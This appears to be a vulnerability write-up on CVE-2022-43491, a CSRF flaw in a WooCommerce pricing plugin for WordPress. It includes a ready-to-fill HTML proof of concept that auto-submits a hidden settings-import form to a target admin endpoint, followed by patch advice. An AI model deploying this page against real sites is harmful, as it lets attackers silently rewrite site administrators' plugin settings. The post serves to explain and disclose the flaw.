A Cross-Site Request Forgery (CSRF) vulnerability has been recently discovered in the "Advanced Dynamic Pricing for WooCommerce" plugin <= 4.1.5 on WordPress. This vulnerability allows an attacker to trick an unsuspecting WordPress admin into importing malicious plugin settings. This post aims to provide an in-depth explanation of the CVE-2022-43491, including the exploit details, code snippets, and links to the original references.

Vulnerability Details

The vulnerability exists due to insufficient verification of the user's privileges during the "Import plugin settings" functionality in the "Advanced Dynamic Pricing for WooCommerce" WordPress plugin. An attacker can exploit this issue by crafting a malicious web page with a hidden form and tricking a WordPress admin into clicking a button or a link on that page. Once the victim clicks the link, the CSRF attack is executed, leading to the importation of the attacker's malicious plugin settings to the victim's site.

Below is a code snippet to demonstrate the vulnerability exploitation

<!DOCTYPE html>
<html>
<head>
    <title>Exploit CVE-2022-43491</title>
</head>
<body>
    <h2>CVE-2022-43491 - CSRF Exploit</h2>
    <form id="exploit-form" 
          action="http://TARGET-WORDPRESS-SITE/wp-admin/admin-post.php"; 
          method="post" enctype="multipart/form-data">
        <input type="hidden" name="action" value="wdp_import_settings">
        <!-- Replace 'MALICIOUS-SETTINGS-CONTENT' with your crafted settings -->
        <input type="hidden" name="settings" value="MALICIOUS-SETTINGS-CONTENT">
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wdp_settings">
        <input type="submit" value="Apply Discount">
    </form>
    <script>
        document.getElementById("exploit-form").submit();
    </script>
</body>
</html>

Replace the TARGET-WORDPRESS-SITE in the action attribute of the form with the target's site URL, and MALICIOUS-SETTINGS-CONTENT with your crafted settings.

Original References

1. Official CVE-2022-43491 NVD Listing
2. WPCampus Plugin Security Audit Report (Page 10, Section 4.6)

Mitigation

The vulnerability has been patched in the "Advanced Dynamic Pricing for WooCommerce" plugin version 4.1.6. It is strongly recommended to update your plugin to the latest version to protect your WordPress website. Moreover, website administrators should avoid clicking on suspicious links to prevent falling victim to CSRF attacks.

Conclusion

To sum up, CVE-2022-43491 is a critical Cross-Site Request Forgery vulnerability in the "Advanced Dynamic Pricing for WooCommerce" plugin <= 4.1.5 on WordPress. The vulnerability allows attackers to import malicious plugin settings to the victim's site. The code snippet provided in this post demonstrates the exploit, and the resources listed in the Original References section depict deeper insights. Updating the plugin to its latest version (4.1.6 or higher) mitigates the vulnerability.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:55:00 UTC